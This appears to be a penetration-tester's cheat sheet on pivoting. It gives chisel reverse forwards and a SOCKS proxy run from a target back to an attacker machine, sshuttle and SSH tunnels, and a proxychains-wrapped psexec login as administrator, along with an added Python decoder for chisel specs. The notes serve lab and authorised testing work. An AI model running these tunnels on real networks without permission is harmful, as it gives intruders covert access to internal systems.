Port Forwarding - Tunneling

Last updated 3 years ago

Chisel

Port forwarding,

Forwarding the target's port 8080 back to localhost on Kali (reverse port forward through the chisel client),

On kali,

./chisel server --reverse --port 9001

On target,

.\chisel.exe client <kali-ip>:9001 R:<local-port>:127.0.0.1:<target-port>

example,
.\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080

SOCKS5 proxy with chisel,

On kali,

./chisel server -p 9001 --socks5 --reverse

On target,

chisel client <kali-ip>:9001 R:5000:socks

R:5000:socks

  • R means a reverse port forward: the chisel server on the attacker machine opens the listener, and the client on the target dials out to it.

  • 5000 is the port on the attacker machine that becomes the entry point to our SOCKS5 proxy; and

  • socks means the listener is a SOCKS5 proxy rather than a fixed port forward, so proxied connections exit from the target.

Add socks5 127.0.0.1 5000 to /etc/proxychains.conf

  • Don't forget to disable DNS resolution over proxychains (comment out proxy_dns in /etc/proxychains.conf).

UDP port forward,

On kali,

/opt/chisel/chisel_1.7.7_linux_386 server --reverse --port 9001

On target,

./chisel_1.7.7_linux_386 client 192.168.119.203:9001 R:10.1.1.89:1978/udp
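As an added example (not from the original notes and not the chisel project's own code), a small Python decoder for the chisel remote specs used above (R:8080:127.0.0.1:8080, R:5000:socks and R:10.1.1.89:1978/udp) that states which side opens the listener, where it binds and where traffic exits, plus the matching proxychains line. It is a simplified re-implementation of chisel's remote syntax; the defaults (0.0.0.0, local-port = remote-port, 127.0.0.1:1080 for socks) are my reading of chisel's README and are assumptions.

```python
"""Decode chisel remote specs: [R:][local-host:][local-port:]remote-host:remote-port[/udp] or [R:][host:][port:]socks.
Simplified re-implementation written for these notes, not chisel's own parser; syntax and defaults
follow chisel's README as I read it (an assumption), e.g. R:5000:socks, R:10.1.1.89:1978/udp."""
from dataclasses import dataclass

@dataclass
class Remote:
    reverse: bool          # "R:" prefix: the chisel server opens the listener, the client dials out
    socks: bool            # trailing "socks": the listener is a SOCKS5 proxy with no fixed remote
    proto: str             # "tcp", or "udp" when the spec ends in "/udp"
    local_host: str        # where the listener binds
    local_port: int
    remote_host: str = ""  # what the dialing side connects to (empty for socks)
    remote_port: int = 0

def decode_remote(spec: str) -> Remote:
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    body, proto = (body[:-4], "udp") if body.endswith("/udp") else (body, "tcp")
    parts = body.split(":") if body else []
    socks = bool(parts) and parts[-1] == "socks"
    parts = parts[:-1] if socks else parts
    hosts, ports = [], []
    for tok in reversed(parts):        # right to left, so omitted left-hand fields take defaults
        (ports if tok.isdigit() else hosts).append(tok)
    if len(ports) > 2 or len(hosts) > 2 or (socks and proto == "udp") or not (socks or ports):
        raise ValueError(f"invalid remote: {spec!r}")
    if socks:                          # remaining tokens describe the proxy listener only
        return Remote(reverse, True, proto, hosts[0] if hosts else "127.0.0.1",
                      int(ports[0]) if ports else 1080)
    remote_port = int(ports[0])                                      # required
    local_port = int(ports[1]) if len(ports) == 2 else remote_port   # defaults to remote-port
    remote_host = hosts[0] if hosts else "0.0.0.0"                   # the dialing side's own host
    local_host = hosts[1] if len(hosts) == 2 else "0.0.0.0"         # all interfaces
    return Remote(reverse, False, proto, local_host, local_port, remote_host, remote_port)

def describe(spec: str) -> str:
    """Which chisel side opens the listener, where it binds and where traffic exits."""
    r = decode_remote(spec)
    opener, dialer = ("server", "client") if r.reverse else ("client", "server")
    if r.socks:
        return f"SOCKS5 proxy on {r.local_host}:{r.local_port} at the {opener}; exits via the {dialer} host"
    return f"{opener} listens on {r.local_host}:{r.local_port}/{r.proto}; {dialer} dials {r.remote_host}:{r.remote_port}"

def proxychains_line(spec: str) -> str:
    # the ProxyList entry for /etc/proxychains.conf that matches a socks remote
    r = decode_remote(spec)
    if not r.socks:
        raise ValueError(f"not a socks remote: {spec!r}")
    return f"socks5 {r.local_host} {r.local_port}"
```

Running describe() over the three specs from these notes shows that every R: remote opens its listener on the attacker's chisel server, which is the side a defender would expect to see the inbound connection from the target.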

Sshuttle

This is the best tunneling tool

Standalone (compiled and ready to be executed) binaries,

sshuttle -vvv -e 'ssh -i id_rsa' -r morph3@10.11.1.252 -x 10.11.1.252 10.2.2.1/24
sudo ./sshuttle -e "ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -c 3des-cbc" -r morph3@10.11.1.252:22000 10.2.2.1/24

SSH

Port forwarding,

forwards remote host 10.10.10.99:1978 (reached via 1.3.3.7) back to localhost:1978

ssh -L 127.0.0.1:1978:10.10.10.99:1978 morph3@1.3.3.7

Tunneling (dynamic SOCKS proxy, then proxychains),

ssh morph3@1.3.3.7 -p22000 -D 127.0.0.1:1080
proxychains firefox
proxychains impacket-psexec administrator@10.13.37.1

Regeorg

https://github.com/sensepost/reGeorg

Links,

https://github.com/jpillora/chisel/releases
https://github.com/sshuttle/sshuttle
https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.5
https://github.com/rholder/sshuttle-binary/releases/tag/v0.78.0